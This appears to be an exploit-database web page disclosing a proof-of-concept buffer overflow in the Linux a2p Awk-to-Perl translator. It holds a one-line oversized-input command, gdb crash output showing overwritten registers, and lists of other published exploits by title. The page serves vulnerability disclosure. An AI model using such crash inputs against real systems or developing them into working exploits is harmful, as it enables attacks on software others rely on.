Search for hundreds of thousands of exploits

"Awk to Perl 1.007-5 - Buffer Overflow (PoC)"

Author

Exploit author

"Todor Donev"

Platform

Exploit platform

linux

Release date

Exploit published date

2018-07-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Exploit Title: Awk to Perl 1.007-5 - Buffer Overflow (PoC)
# Author: Todor Donev
# Date: 2018-07-11
# Software: Linux Awk to Perl Translator '/usr/bin/a2p'
# Version: 1.007-5
# CVE: N/A
# Tested on: CentOS 6.9, Ubuntu 10

[todor@adamantium ~]$ python -c "print 'A' * 2070" | a2p > /dev/null
Segmentation fault
[todor@adamantium ~]$ gdb a2p --quiet
Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install *SNIPED*
(gdb) r bof
Starting program: /usr/bin/a2p bof
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x0074ee65 in fgets () from /lib/libc.so.6
(gdb) info reg
eax            0x1060	4192
ecx            0x1	1
edx            0x41414141	1094795585
ebx            0x880ff4	8916980
esp            0xbffff0f0	0xbffff0f0
ebp            0xbffff118	0xbffff118
esi            0x41414141	1094795585
edi            0x8062920	134621472
eip            0x74ee65	0x74ee65 <fgets+53>
eflags         0x210216	[ PF AF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb)
Release DateTitleTypePlatformAuthor
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel MonzΓ³n"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
Release DateTitleTypePlatformAuthor
2020-02-24"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2019-10-08"Zabbix 4.4 - Authentication Bypass"webappsphp"Todor Donev"
2019-09-23"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure"remotehardware"Todor Donev"
2019-09-09"WordPress 5.2.3 - Cross-Site Host Modification"webappsphp"Todor Donev"
2019-09-02"Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection"remotehardware"Todor Donev"
2019-09-02"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read"remotehardware"Todor Donev"
2019-05-24"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC"webappsphp"Todor Donev"
2018-07-11"Awk to Perl 1.007-5 - Buffer Overflow (PoC)"locallinux"Todor Donev"
2018-06-22"Opencart < 3.0.2.0 - Denial of Service"dosphp"Todor Donev"
2018-04-02"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change"webappshardware"Todor Donev"
2018-03-30"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change"webappsasp"Todor Donev"
2018-03-30"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)"webappsasp"Todor Donev"
2018-03-30"Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change"webappsasp"Todor Donev"
2018-03-30"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change"webappsasp"Todor Donev"
2018-03-28"Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change"webappshardware"Todor Donev"
2018-01-17"D-Link DSL-2640R - DNS Change"webappshardware"Todor Donev"
2017-06-18"D-Link DSL-2640B ADSL Router - 'dnscfg' Remote DNS Change"webappshardware"Todor Donev"
2017-06-17"D-Link DSL-2640U - DNS Change"webappshardware"Todor Donev"
2017-06-17"Beetel BCM96338 Router - DNS Change"webappshardware"Todor Donev"
2017-06-17"UTstarcom WA3002G4 - DNS Change"webappshardware"Todor Donev"
2017-06-16"iBall Baton iB-WRA150N - DNS Change"webappshardware"Todor Donev"
2017-01-22"SunOS 5.11 ICMP - Denial of Service"dosunix"Todor Donev"
2017-01-19"Tenda ADSL2/2+ Modem D820R - DNS Change"webappshardware"Todor Donev"
2017-01-19"Pirelli DRG A115 v3 ADSL Router - DNS Change"webappshardware"Todor Donev"
2017-01-16"Tenda ADSL2/2+ Modem D840R - DNS Change"webappshardware"Todor Donev"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45009/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.